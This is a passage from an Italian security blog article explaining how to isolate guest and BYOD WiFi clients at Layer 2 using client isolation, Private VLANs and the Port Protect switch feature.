     • Non richiede configurazioni manuali.
     • Funziona in modo automatico con la maggior parte dei dispositivi.

     
     

   • ⚠️ Limiti:
     
     • Se un dispositivo utilizza un IP statico, potrebbe non essere riconosciuto correttamente e il traffico verrà bloccato.
     • Per evitare queste situazioni, è consigliabile abilitare la funzione di DHCP enforcement a livello di SSID (quando supportata). Ne parleremo in dettaglio nei prossimi articoli.

     
     

   
   

2. Statica basata su whitelist MAC
   In questa modalità, è possibile configurare manualmente una whitelist di indirizzi MAC autorizzati, come ad esempio quelli del gateway o di eventuali dispositivi di servizio specifici. Così facendo, tutte le comunicazioni locali verso dispositivi diversi da quelli in whitelist vengono bloccate.
   
   • ✅ Vantaggi:
     
     • Maggiore controllo e sicurezza: si evitano automatismi e si definisce in modo esplicito con chi i client possono comunicare.

     
     

   • ⚠️ Limiti:
     
     • Richiede una configurazione manuale: qualsiasi cambiamento del MAC del gateway (per esempio in caso di failover o sostituzione del router) impone l’aggiornamento della whitelist.
     • Meno adatta a reti dinamiche o con variazioni frequenti nella topologia.

     
     

   
   

Entrambe le modalità possono essere scelte o combinate in base al livello di controllo desiderato e alle funzionalità disponibili sugli apparati di rete.

In ogni caso, il principio resta invariato: impedire qualsiasi comunicazione diretta tra i client wireless e garantire che ogni flusso di dati passi attraverso un punto di controllo Layer 3, dove possono essere applicate regole e policy centralizzate.

Private Vlan e Port Protect sulla rete di trasporto:

Come accennato in precedenza, l’isolamento del traffico a livello di rete di trasporto è una misura fondamentale per garantire la sicurezza delle comunicazioni, specialmente in contesti in cui si connettono dispositivi non gestiti, come nelle reti WiFi Guest o BYOD. Questo isolamento diventa cruciale per prevenire attacchi interni e ridurre il rischio di compromissioni tra dispositivi collegati alla stessa rete.

Anche quando la Client Isolation è abilitata a livello wireless, il traffico Layer 2 può comunque propagarsi attraverso la rete cablata, se non vengono adottate ulteriori misure. Questo accade, ad esempio, quando abbiamo, più access point che bridgeano localmente il traffico, inoltrandolo direttamente sulle porte di rete degli switch senza tunnelizzarlo verso un controller centralizzato. In questi casi, i dispositivi connessi a diversi AP potrebbero comunque riuscire a comunicare tra loro attraverso la rete di trasporto, vanificando di fatto l’isolamento previsto sulla rete WiFi.

NB: Se l’access point tunnelizza il traffico guest verso un controller centrale (es. CAPWAP o GRE), l’isolamento può essere gestito a monte, rendendo opzionale l’isolamento locale delle porte. In caso di bridge locale, l’isolamento Layer 2 è invece fondamentale.

Per impedire che dispositivi connessi alla stessa infrastruttura possano comunicare direttamente tra loro, è necessario adottare meccanismi di isolamento Layer 2 a livello switch. Le due tecniche principali per raggiungere questo obiettivo sono:

• Private VLAN (PVLAN): Consente di creare segmentazioni avanzate per isolare i dispositivi connessi alla rete.
• Port Protect: Fornisce un’alternativa leggera e semplice per bloccare la comunicazione diretta tra porte configurate sugli switch.

Entrambe le configurazioni aiutano a:

• Limitare la comunicazione diretta: Bloccare il traffico Layer 2 tra dispositivi connessi.
• Proteggere i dispositivi collegati: Prevenire attacchi interni come sniffing, spoofing o man-in-the-middle.
• Migliorare la sicurezza complessiva: Garantire che ogni dispositivo comunichi solo con entità autorizzate o attraverso un controllo Layer 3.

La scelta tra PVLAN e Port Protect dipende da diversi fattori, tra cui la complessità dell’infrastruttura di rete e i requisiti specifici di isolamento.
Le Private VLAN offrono un isolamento più granulare e flessibile, ideale per ambienti complessi, multi-tenant o con alta densità di utenti.
Al contrario, la funzione Port Protect rappresenta una soluzione più semplice e veloce da implementare, perfetta per contesti meno strutturati o dove è richiesta una configurazione rapida.

NB: Inoltre, va considerato che molti switch entry-level supportano solo Port Protect e non le PVLAN. In questi casi, Port Protect diventa l’unica opzione praticabile per garantire un isolamento Layer 2.

Private VLAN (PVLAN)

Per garantire l’isolamento del traffico a livello di rete di trasporto, è altamente consigliato configurare le Private VLAN (PVLAN). Questa tecnica consente di limitare la comunicazione diretta tra porte all’interno della stessa VLAN, permettendo il traffico solo verso porte specifiche come gli uplink.:

Cos’è una PVLAN?

Una Private VLAN è un’estensione delle VLAN tradizionali

Una Primary VLAN può includere diverse Secondary VLAN, che si classificano in due categorie:

• Isolated VLAN
• Community VLAN

A queste si aggiunge la possibilità di assegnare alla Primary VLAN delle Promiscuous Port.

Tipologie di porte in una PVLAN

1. Promiscuous Ports (Porte Promiscue):
   
   • Possono comunicare con tutte le porte ( comprese le isolate e community).
   • Tipicamente utilizzata per uplink verso router, firewall, gateway o server condivisi.

   
   

2. Isolated Ports (Porte Isolate):
   
   • Non può comunicare con altre porte isolate, ma solo con la promiscuous.
   • Ideale per client guest o dispositivi che non devono mai comunicare tra loro (es. le porte che sono verso gli AP).

   
   

3. Community Ports (Porte Comunitarie):
   
   • Può comunicare con altre porte della stessa community e con la promiscuous, ma non con le porte isolate.
   • Utile per piccoli gruppi che condividono risorse, come stampanti o NAS interni. Le porte community solitamente non vengono utilizzate in una rete guest o BYOD.

   
   

Come Funziona una PVLAN

Lo schema rappresenta una configurazione Private VLAN (PVLAN) su uno switch gestito, con porte suddivise in diverse tipologie:

Promiscuous Port (P)

• Situata a sinistra dello switch, è collegata al router/firewall, ovvero il punto di uscita verso la rete esterna.
• Tutti i dispositivi nello schema possono comunicare con questa porta.
• Serve come gateway centralizzato per l’accesso a Internet o a servizi comuni.

Community Ports (C1 e C2)

• I PC grigi in alto sono collegati a porte di tipo C1 (Community 1).
• I PC blu a destra sono collegati a porte di tipo C2 (Community 2).

Comportamento:

• I dispositivi C1 possono comunicare tra loro e con la promiscuous (P), ma non con i dispositivi C2 o I.
• I dispositivi C2 possono comunicare tra loro e con la promiscuous (P), ma non con i dispositivi C1 o I.

👉In questo modo abbiamo più “gruppi di lavoro” indipendenti sulla stessa VLAN, ciascuno isolato dagli altri ma con accesso condiviso a internet.

Isolated Ports (I)

• I tre PC rossi in basso sono connessi a porte isolate.

Comportamento:

• Questi dispositivi non possono comunicare tra loro.
• Possono parlare solo con la porta promiscuous (P), quindi accedere a internet tramite il router/firewall.
• Sono perfetti per ambienti guest WiFi o dispositivi non affidabili che devono essere completamente separati l’uno dall’altro e dagli altri apparati di rete

Collegamento tra Switch

• In basso a sinistra è presente un uplink verso un secondo switch.
• Le porte di uplink tra switch in una rete PVLAN devono essere configurate come trunk, trasportare tutte le VLAN coinvolte (Primary + Secondary), e non devono avere alcun ruolo PVLAN assegnato.
• L’obiettivo è mantenere la struttura di isolamento identica su tutta la dorsale della rete.

Sintesi comportamentale

Questa configurazione garantisce un isolamento di livello 2 molto preciso, mantenendo allo stesso tempo l’accesso centralizzato alle risorse comuni. È particolarmente utile in ambienti ad alta densità, come hotel, data center, coworking o reti BYOD.

Port Protect: l’alternativa semplice alle PVLAN

La funzione Port Protect, disponibile su molti switch gestiti, è una soluzione pratica per impedire la comunicazione diretta tra dispositivi connessi a porte Layer 2 sullo stesso dominio di broadcast.

A differenza delle PVLAN, Port Protect lavora a livello di porta, non richiede configurazione VLAN secondarie e risulta particolarmente utile quando:

• l’infrastruttura non supporta PVLAN
• si opera in ambienti più semplici, dove è sufficiente un isolamento minimo ma efficace .

Possiamo vedere la protect port come una soluzione rapida e semplice da implementare, anche senza policy complesse.

Esempio pratico della port protect

Analizzando lo schema in alto possiamo quindi affermare che tutti PC possono parlare con il router/firewall ma non tra di loro.

Tabella comparativa: PVLAN vs Port Protect

Scenari pratici – quale soluzione adottare?

Conclusioni

Le reti WiFi aperte, per loro natura, nascono come insicure: nessuna autenticazione, traffico in chiaro, utenti non tracciati.
Ma questo non significa che non possiamo fare nulla per migliorare la situazione.

Una delle contromisure più efficaci è l’isolamento del traffico a livello Layer 2.
Bloccare la comunicazione diretta tra dispositivi connessi alla stessa rete – WiFi o cablata – è fondamentale per prevenire attacchi laterali come sniffing, ARP spoofing o accessi non autorizzati.

Tecnologie come le Private VLAN e la Port Protect ci permettono di ottenere questo isolamento in modo efficace e adattabile al tipo di infrastruttura.

Queste soluzioni, insieme ad altre contromisure che stiamo approfondendo nella nostra rubrica (come Captive Portal e AAA), trasformano una WiFi aperta in un ambiente più sicuro.

Non possiamo sempre impedire ad un attaccante di entrare in una rete pubblica aperta.
Ma possiamo – anzi dobbiamo – fare tutto quello che è in nostro potere per evitare che possa nuocere ad altri.

L'articolo Reti WiFi Guest: Segmentare senza isolare è come mettere porte senza pareti. proviene da il blog della sicurezza informatica.